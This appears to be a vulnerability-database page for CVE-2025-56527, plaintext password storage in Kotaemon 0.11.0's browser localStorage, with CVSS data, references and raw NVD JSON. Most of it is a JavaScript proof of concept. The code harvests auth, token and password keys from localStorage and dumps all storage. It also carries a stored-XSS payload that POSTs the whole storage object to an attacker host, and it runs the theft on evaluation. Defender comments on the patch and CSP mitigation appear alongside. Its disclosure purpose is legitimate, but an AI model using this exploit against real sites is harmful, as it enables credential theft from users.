Security Vulnerability Report
CVE-2025-56527 CVSS 7.5 HIGH

CVE-2025-56527

Published: 2025-11-18 17:16:05
Last Modified: 2025-12-02 19:37:50

Description

Plaintext password storage in Kotaemon 0.11.0 in the client's localStorage.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cinnamon:kotaemon:*:*:*:*:*:*:*:* - VULNERABLE
Kotaemon 0.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-56527 PoC - Plaintext Password Storage in Kotaemon localStorage
// This PoC demonstrates how an attacker can extract plaintext credentials from localStorage.
// Weakness class: CWE-256 (plaintext storage of a password); CVSS 3.1 base 7.5 (C:H / I:N / A:N).
// Root cause from the defender's side: localStorage is readable by any script running on the
// same origin, so a persisted credential is exposed by a single XSS (the third-party advisory
// in the references below pairs this issue with a stored XSS in the same product) or by any
// browser extension / local user with access to the profile. The referenced vendor patch is
// commit 37cdc28 in Cinnamon/kotaemon. Mitigation: never persist the raw password client-side;
// keep session material in HttpOnly + SameSite cookies, and restrict outbound requests with a
// CSP connect-src so a script cannot post storage contents to an arbitrary origin.

// Attack vector 1: Direct localStorage access via JavaScript
// Returns a plain object of {key: rawValue} for every localStorage key whose lower-cased name
// contains one of the substrings below. The match is a heuristic — a key such as "userPrefs"
// also matches "user" — so the result may contain non-secret entries.
function stealCredentials() {
  const storageKeys = Object.keys(localStorage);
  const credentials = {};
  storageKeys.forEach(key => {
    const value = localStorage.getItem(key);
    // Look for authentication-related keys
    if (key.toLowerCase().includes('auth') ||
        key.toLowerCase().includes('token') ||
        key.toLowerCase().includes('password') ||
        key.toLowerCase().includes('user') ||
        key.toLowerCase().includes('credential')) {
      credentials[key] = value;
    }
  });
  return credentials;
}

// Attack vector 2: XSS-based credential theft
// Inject this payload via Stored XSS to steal plaintext passwords
// Defender note: this is the exfiltration path the CVSS "AV:N / PR:N" rating assumes. It is a
// cross-origin POST of the whole storage object, so it is visible in the browser's network log
// and is blocked outright by a CSP connect-src that does not allow-list the receiving host.
// Object.assign({}, localStorage) relies on Storage exposing items as enumerable own
// properties — presumably true in the browsers targeted; verify per engine.
const xssPayload = `
<script>
fetch('https://attacker.com/steal', {
  method: 'POST',
  body: JSON.stringify({
    url: window.location.href,
    credentials: Object.assign({}, localStorage)
  })
});
</script>
`;

// Attack vector 3: Automated credential extraction
// Dumps every key/value pair via the indexed Storage API (length + key(i)), without the
// keyword filter used in stealCredentials, then logs and returns the object.
function extractAllLocalStorage() {
  const data = {};
  for (let i = 0; i < localStorage.length; i++) {
    const key = localStorage.key(i);
    data[key] = localStorage.getItem(key);
  }
  console.log('Extracted localStorage data:', data);
  return data;
}

// Execute credential theft
// Top-level statements: these run as soon as the script is evaluated on the target origin.
const stolenCredentials = stealCredentials();
console.log('Stolen credentials:', stolenCredentials);

// Check for plaintext password fields
// Each filtered value is parsed as JSON and inspected for common password property names.
// The empty catch intentionally skips values that are not valid JSON (plain string tokens
// and the like), so those are still in stolenCredentials but are not logged here.
Object.keys(stolenCredentials).forEach(key => {
  try {
    const parsed = JSON.parse(stolenCredentials[key]);
    if (parsed.password || parsed.pwd || parsed.credentials) {
      console.log('Found plaintext password:', parsed);
    }
  } catch (e) {}
});

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56527", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:04.760", "lastModified": "2025-12-02T19:37:49.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plaintext password storage in Kotaemon 0.11.0 in the client's localStorage."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-256"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cinnamon:kotaemon:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.0", "matchCriteriaId": "3A364AA3-7EC9-49E9-AF67-F3E649361780"}]}]}], "references": [{"url": "https://github.com/Cinnamon/kotaemon", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Cinnamon/kotaemon/commit/37cdc28", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363?pvs=74", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}